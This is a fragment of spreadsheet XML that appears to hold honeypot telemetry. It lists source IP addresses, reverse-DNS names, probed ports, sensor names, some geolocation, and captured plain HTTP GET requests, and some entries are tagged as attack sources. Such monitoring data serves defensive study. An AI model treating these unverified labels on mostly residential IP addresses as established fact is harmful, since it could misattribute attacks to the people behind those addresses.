    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;9100&amp;&amp;5060&amp;&amp;3306&amp;&amp;5900&amp;&amp;25&amp;&amp;32068&amp;&amp;23&amp;&amp;80&amp;&amp;8753&amp;&amp;47929&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:bbc3</t>
  </si>
  <si>
    <t>dc8ae938662220b1c6fb65a317fd473b</t>
  </si>
  <si>
    <t>14.176.231.1</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1433&amp;&amp;51347</t>
  </si>
  <si>
    <t>DN</t>
  </si>
  <si>
    <t>Da Nang</t>
  </si>
  <si>
    <t>Sơn Trà District</t>
  </si>
  <si>
    <t>Sơn Trà</t>
  </si>
  <si>
    <t>8656396</t>
  </si>
  <si>
    <t>16.0607</t>
  </si>
  <si>
    <t>108.233</t>
  </si>
  <si>
    <t>::ffff:eb0:e701</t>
  </si>
  <si>
    <t>8ba49f500adbf307896df8e020ca0579</t>
  </si>
  <si>
    <t>220.134.74.45</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-134-74-45.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;61031&amp;&amp;23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80&amp;&amp;58886&amp;&amp;58838</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:4a2d</t>
  </si>
  <si>
    <t>52ff380187805dcf43c708bddf355309</t>
  </si>
  <si>
    <t>117.253.212.110</t>
  </si>
  <si>
    <t>::ffff:75fd:d46e</t>
  </si>
  <si>
    <t>ff2f44854b38b5d3a745d3139fbb3f99</t>
  </si>
  <si>
    <t>129.126.213.221</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>1987-12-01</t>
  </si>
  <si>
    <t>M1NET-SG</t>
  </si>
  <si>
    <t>::ffff:817e:d5dd</t>
  </si>
  <si>
    <t>d46ab4028b7d1c1ed218834ee4f5f48f</t>
  </si>
  <si>
    <t>42.60.108.30</t>
  </si>
  <si>
    <t>bb42-60-108-30.singnet.com.sg&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;10469&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>2011-02-18</t>
  </si>
  <si>
    <t>SINGTEL-FIBRE-42-60-108-0</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:2a3c:6c1e</t>
  </si>
  <si>
    <t>e4a5fd72c5676c5b9fbaf95a9bd18d6c</t>
  </si>
  <si>
    <t>59.127.142.62</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-142-62.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;161&amp;&amp;NA&amp;&amp;60506&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7f:8e3e</t>
  </si>
  <si>
    <t>3be76aaa5fee82448e8e5c0b1d20ccde</t>
  </si>
  <si>
    <t>220.132.127.176</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-127-176.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>23&amp;&amp;37023&amp;&amp;56053&amp;&amp;56081&amp;&amp;56065&amp;&amp;64695&amp;&amp;48412&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc84:7fb0</t>
  </si>
  <si>
    <t>b94c746a8601bf578f529cd4685259e5</t>
  </si>
  <si>
    <t>117.208.221.74</t>
  </si>
  <si>
    <t>::ffff:75d0:dd4a</t>
  </si>
  <si>
    <t>ce6c06afb221a024665515bcd01fd1e4</t>
  </si>
  <si>
    <t>117.204.149.22</t>
  </si>
  <si>
    <t>::ffff:75cc:9516</t>
  </si>
  <si>
    <t>aa6720d752d8353c0b4ea6876d3c77e7</t>
  </si>
  <si>
    <t>173.2.135.126</t>
  </si>
  <si>
    <t>NA&amp;&amp;ool-ad02877e.dyn.optonline.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>40.8043</t>
  </si>
  <si>
    <t>-74.0121</t>
  </si>
  <si>
    <t>::ffff:ad02:877e</t>
  </si>
  <si>
    <t>b956c9051930a7c2e3c14210ad7b4044</t>
  </si>
  <si>
    <t>117.235.101.143</t>
  </si>
  <si>
    <t>::ffff:75eb:658f</t>
  </si>
  <si>
    <t>bcd777047fcc8ac352edef67a7418237</t>
  </si>
  <si>
    <t>117.206.31.79</t>
  </si>
  <si>
    <t>::ffff:75ce:1f4f</t>
  </si>
  <si>
    <t>be4193b30838b2d2b633e99ecb4bb78f</t>
  </si>
  <si>
    <t>125.229.224.226</t>
  </si>
  <si>
    <t>125-229-224-226.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;53&amp;&amp;62756&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:e0e2</t>
  </si>
  <si>
    <t>be5e706aa79be4eeb88baa67a4b11602</t>
  </si>
  <si>
    <t>59.126.136.131</t>
  </si>
  <si>
    <t>59-126-136-131.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_PJL_H42&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;445&amp;&amp;5900&amp;&amp;443&amp;&amp;9100&amp;&amp;389&amp;&amp;22&amp;&amp;4798&amp;&amp;6730&amp;&amp;40936&amp;&amp;63468&amp;&amp;40952&amp;&amp;38537</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:8883</t>
  </si>
  <si>
    <t>c5641fdd8ded64397b3265129a7d416b</t>
  </si>
  <si>
    <t>114.33.254.88</t>
  </si>
  <si>
    <t>114-33-254-88.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;11965</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:fe58</t>
  </si>
  <si>
    <t>d6134d388630deb15faa5d9b37682969</t>
  </si>
  <si>
    <t>36.235.117.177</t>
  </si>
  <si>
    <t>36-235-117-177.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:24eb:75b1</t>
  </si>
  <si>
    <t>e72edaef00ffd05040d799743d687949</t>
  </si>
  <si>
    <t>114.35.102.128</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-102-128.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;21&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7223:6680</t>
  </si>
  <si>
    <t>b3afd12e30a8745494df66530986af69</t>
  </si>
  <si>
    <t>122.168.126.219</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H24</t>
  </si>
  <si>
    <t>23.259900000000002</t>
  </si>
  <si>
    <t>77.4126</t>
  </si>
  <si>
    <t>1 Malviya Nagar</t>
  </si>
  <si>
    <t>ABTS-DSL-MPCG</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.168.126.219,59226)}</t>
  </si>
  <si>
    <t>::ffff:7aa8:7edb</t>
  </si>
  <si>
    <t>0d8ae025636463185021730858fc3c2f</t>
  </si>
  <si>
    <t>114.35.42.193</t>
  </si>
  <si>
    <t>114-35-42-193.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;25577&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:2ac1</t>
  </si>
  <si>
    <t>ead8bd10fe99998b00cc45d5f0061570</t>
  </si>
  <si>
    <t>101.109.169.247</t>
  </si>
  <si>
    <t>NA&amp;&amp;node-xkn.pool-101-109.dynamic.nt-isp.net</t>
  </si>
  <si>
    <t>::ffff:656d:a9f7</t>
  </si>
  <si>
    <t>c80f5971a5831e095f674146ee58d16f</t>
  </si>
  <si>
    <t>114.35.57.211</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-57-211.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9